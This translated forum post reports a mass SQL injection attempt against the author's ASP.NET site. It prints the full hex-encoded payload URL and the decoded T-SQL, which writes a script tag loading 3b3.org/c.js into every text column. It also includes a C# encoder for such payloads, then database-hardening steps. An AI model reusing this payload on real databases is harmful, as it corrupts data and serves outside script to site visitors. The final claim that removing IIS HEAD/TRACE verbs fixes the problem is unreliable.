Four Steps to Block the 3b3.org c.js Injection

Source: Internet
Uploaded by: User

I suggest everyone block this IP. I searched on Baidu and found others who were attacked the same way. Luckily, all my query statements use parameters; if they had been built by string concatenation, it would probably have been a disaster.

This is also a lesson for us: when you concatenate SQL, do not count on luck.

This is the link address that was requested:

http://www.kilonet.cn/web/Info.aspx?g=info&c=CT0147&id=200811240069';DeCLaRE@S NvArCHaR(4000);SeT@S=CaSt(0x4400650063006C0061007200650020004000540020005600610072006300680061007200280032003500350029002C0040004300200056006100720063006800610072002800320035003500290020004400650063006C0061007200650020005400610062006C0065005F0043007500720073006F007200200043007500720073006F007200200046006F0072002000530065006C00650063007400200041002E004E0061006D0065002C0042002E004E0061006D0065002000460072006F006D0020005300790073006F0062006A006500630074007300200041002C0053007900730063006F006C0075006D006E00730020004200200057006800650072006500200041002E00490064003D0042002E0049006400200041006E006400200041002E00580074007900700065003D00270075002700200041006E0064002000280042002E00580074007900700065003D003900390020004F007200200042002E00580074007900700065003D003300350020004F007200200042002E00580074007900700065003D0032003300310020004F007200200042002E00580074007900700065003D00310036003700290020004F00700065006E0020005400610062006C0065005F0043007500720073006F00720020004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C0065005F0043007500720073006F007200200049006E0074006F002000400054002C004000430020005700680069006C006500280040004000460065007400630068005F005300740061007400750073003D0030002900200042006500670069006E00200045007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200053006500740020005B0027002B00400043002B0027005D003D0052007400720069006D00280043006F006E007600650072007400280056006100720063006800610072002800380030003000300029002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F003300620033002E006F00720067002F0063002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C0065005F0043007500720073006F007200200049006E0074006F002000400054002C0040004300200045006E006400200043006C006F007300650020005400610062006C0065005F0043007500720073006F00720020004400650061006C006C006F00630061007400650020005400610062006C0065005F0043007500720073006F007200aS NvArChAR(4000));ExEc(@S);--

Actually, I basically no longer maintain this site, because I have no time to improve and manage it. I had added an activity log for online visitors, but unfortunately it was not saved to the log file. I plan to improve the logging when I have time, so that I do not get hit again without knowing what happened.

The decoded code is:

Declare @T Varchar(255),@C Varchar(255) Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next From   Table_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://3b3.org/c.js></script>''')Fetch Next From   Table_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor

Here is the lookup data for this IP:

    74.222.6.95
  • Primary data on this site: United States
  • Secondary data on this site: no one has submitted data yet
  • Reference data 1: United States
  • Reference data 2: United States

The part of the attacker's code that generates the hex-encoded SQL injection payload:

        // Encoder that turns the T-SQL text into the 0x... literal seen in the URL above.
        // Each character is written as its code unit followed by "00", i.e. UTF-16
        // little-endian, which is why the literal is cast to NVARCHAR on the server.
        using System.Text;
        using Microsoft.VisualBasic;

        // Wrapper class added only so the method compiles on its own.
        static class HexEncoder
        {
            /// <summary>
            /// Converts a string to a hexadecimal literal (UTF-16LE bytes prefixed with 0x).
            /// </summary>
            /// <param name="Data">The SQL text to encode.</param>
            /// <returns>The hex literal, e.g. "0x44006500..." for "De...".</returns>
            static string ToHexString(string Data)
            {
                StringBuilder sb = new StringBuilder("0x");
                foreach (char c in Data)
                {
                    // Conversion.Hex gives the code unit without leading zeros; the
                    // appended "00" is the high byte of each little-endian UTF-16 unit.
                    sb.Append(Conversion.Hex((int)c)).Append("00");
                }
                return sb.ToString();
            }
        }


Four steps to block the 3b3.org c.js injection

1. Do not connect to the database as the sa user.

2. Create a database user that has only public permissions, and use this user to access the database.

3. Remove the public role's SELECT permission on the sysobjects and syscolumns objects.

[Users] -> user name -> right-click -> Properties -> Permissions -> mark an "×" (deny) on sysobjects and syscolumns.

4. Verify with the following code (failure means the permissions are correct):

DECLARE @T varchar(255),
        @C varchar(255)
-- The same enumeration the payload relies on: every user table and its text-type columns.
-- If public can no longer SELECT from sysobjects/syscolumns, this fails, which is what we want.
DECLARE Table_Cursor CURSOR FOR
Select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
    print @c   -- only prints the column name; nothing is modified
    FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

In IIS on the server, open the properties of the compromised website, go to Home Directory -> Configuration, find the mappings for .asp and .aspx, remove the HEAD and TRACE verbs from them and keep only GET and POST. That resolves it.

Note that removing the HEAD and TRACE verbs does not affect normal access to the website at all; a normal website does not need these two verbs.
